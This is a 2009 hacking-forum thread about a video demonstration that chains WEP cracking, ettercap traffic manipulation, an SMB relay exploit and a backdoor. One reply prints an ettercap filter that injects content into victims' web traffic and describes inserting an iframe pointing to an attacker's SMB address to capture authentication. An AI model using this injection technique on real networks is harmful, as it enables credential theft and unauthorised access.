Remote Exploit Forums

Go Back   Remote Exploit Forums > Specialist Topics > Backtrack Videos > BT3 Videos


BT3 Videos A collection of videos relating to BT3

   

Reply
 
LinkBack Thread Tools Display Modes
  #1 (permalink)  
Old 06-15-2009, 05:55 AM
Senior Member
 
Join Date: Jan 2008
Posts: 210
Default Hacking illustrated video... wep-> exploit-> backdoor>

This was just for fun... its not really a tutorial but more of a demonstration... i think i did a good job with this video... the music is epic Lol...

cracked wep...
filter traffic with ettercap and force smb authentication...
smb relay exploit...
upload tools for a secure back door...

enjoy and let me know what you think... im going to talk to Adrian Crenshaw's and see if he would like this video on his site...

direct link
http://vimeo.com/5154318
Reply With Quote
  #2 (permalink)  
Old 10-20-2009, 06:34 AM
Just burned his ISO
 
Join Date: Aug 2006
Posts: 2
Default

I liked it. Tought me some things i didnt know so thank you sir
Reply With Quote
  #3 (permalink)  
Old 10-20-2009, 06:15 PM
Senior Member
 
Join Date: Nov 2006
Posts: 313
Default

or just run wepbuster
Reply With Quote
  #4 (permalink)  
Old 10-31-2009, 10:24 AM
New Member
 
Join Date: Oct 2009
Posts: 1
Default

What was the smb.filter? can you post the code?
Very nice video!!
Reply With Quote
  #5 (permalink)  
Old 11-03-2009, 07:07 PM
B@Rz-'s Avatar
Member
 
Join Date: Jun 2009
Posts: 56
Default

Cool blue backtrack

You should explain how did you know that your windows system was vulnerable to that exploit (there has been, for example, no nmap scan!), else there is no fun in watching only the ending in a film!

If you want something that scans ports and tries to find active sessions to be exploited here's a tool called Fast-Track, it's really usefull for lazy people like me
Reply With Quote
  #6 (permalink)  
Old 11-07-2009, 05:14 PM
Reeth's Avatar
Senior Member
 
Join Date: Jun 2009
Location: /.../
Posts: 166
Send a message via ICQ to Reeth
Default

Quote:
If you want something that scans ports and tries to find active sessions to be exploited here's a tool called Fast-Track, it's really usefull for lazy people like me
maybee it is my own inexperience, but as i tried Fast-Track out, Autopwn option didn't worked successfully on all my victim machines

yeah the smb.filter code would be interesting
__________________
„ I'd rather be hated for who I am,
than be loved for who I am not."
Reply With Quote
  #7 (permalink)  
Old 12-13-2009, 10:14 AM
Senior Member
 
Join Date: Jan 2008
Posts: 210
Default

Quote:
Originally Posted by B@Rz- View Post
Cool blue backtrack

You should explain how did you know that your windows system was vulnerable to that exploit (there has been, for example, no nmap scan!), else there is no fun in watching only the ending in a film!

If you want something that scans ports and tries to find active sessions to be exploited here's a tool called Fast-Track, it's really usefull for lazy people like me
fast track is awesome, there is a ettercap filter also used with fast-track

i did know port scan because the ettercap filter + smb exploit works when a vulnerable windows computer surfs the web... the traffic is filtered and i guess you can say a script is injected into the traffic witch will trigger a smb authentication trade off or handshake...

the filter below will simply filter all traffic on port 80 and inject new data on the fly in real time...

if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Nothing!");
}
}

if (ip.proto == TCP && tcp.src == 80) {
if (search(DATA.data, "</title>")) {
replace("</title>", "compile this script then run it with ettercap, surf the web on another computer and you will see this text at the top of every webpage");
msg("IFrame insertedn");
}}




for the exploit to work you need to replace an "iframe src"smb:ipaddress"> the authentication process will then happen...

Ps "this is my drunk typing"
Reply With Quote
  #8 (permalink)  
Old 12-13-2009, 10:46 AM
cRaZylilmuffin's Avatar
Member
 
Join Date: Jul 2009
Posts: 38
Default

Cool vid.
__________________
"Things are not what they appear to be: nor are they otherwise." -Surangama Sutra
Reply With Quote
  #9 (permalink)  
Old 01-08-2010, 04:41 AM
Just burned his ISO
 
Join Date: Aug 2009
Location: Montreal
Posts: 4
Talking

Nice Vid BTW What is the Theme That you are using it is realy Nice
__________________
Qui veut ętre riche en un an, au bout de six mois est pendu.
Reply With Quote
  #10 (permalink)  
Old 02-01-2010, 09:13 AM
New Member
 
Join Date: Feb 2010
Posts: 2
Default

Nice video!
Reply With Quote
Reply

Bookmarks

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On



All times are GMT. The time now is 04:31 PM.


Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2010, Jelsoft Enterprises Ltd.
Search Engine Optimization by vBSEO 3.3.2